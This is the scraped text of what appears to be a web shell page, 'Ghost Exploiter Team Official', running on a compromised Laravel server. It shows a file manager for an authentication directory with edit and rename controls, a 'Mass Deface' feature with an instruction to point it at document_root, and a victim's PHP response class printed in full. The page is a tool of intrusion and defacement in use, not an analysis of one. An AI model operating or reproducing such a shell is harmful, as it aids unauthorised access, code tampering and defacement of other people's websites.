Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Auth
/
Requests
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AuthService.php
0.683KB
edt
ren
FailedValidationExcepti
...
0.988KB
edt
ren
LoginRequest-2026012812
...
1.57KB
edt
ren
LoginRequest.php
1.57KB
edt
ren
LogoutRequest.php
0.454KB
edt
ren
ResourceResponse.php
1.179KB
edt
ren
ResponseDto.php
0KB
edt
ren
ResponseService.php
0.823KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Illuminate\Contracts\Support\Responsable; use Illuminate\Http\JsonResponse; use Illuminate\Support\Facades\Context; final readonly class ResourceResponse implements Responsable { public function __construct( private mixed $data, private int $status ) { } public function toResponse($request): JsonResponse { $requestId = Context::get(key: 'request_id'); $timestamp = Context::get(key: 'timestamp'); return new JsonResponse( data: [ 'status' => $this->status, 'data' => $this->data, 'metadata' => [ 'request_id' => $requestId, 'timestamp' => $timestamp ], ], status: $this->status ); } public static function example(): array { return [ 'data' => [ 'status' => 1, 'data' => [], 'metadata' => [ 'request_id' => '', 'timestamp' => '' ], ], 'status' => 1 ]; } }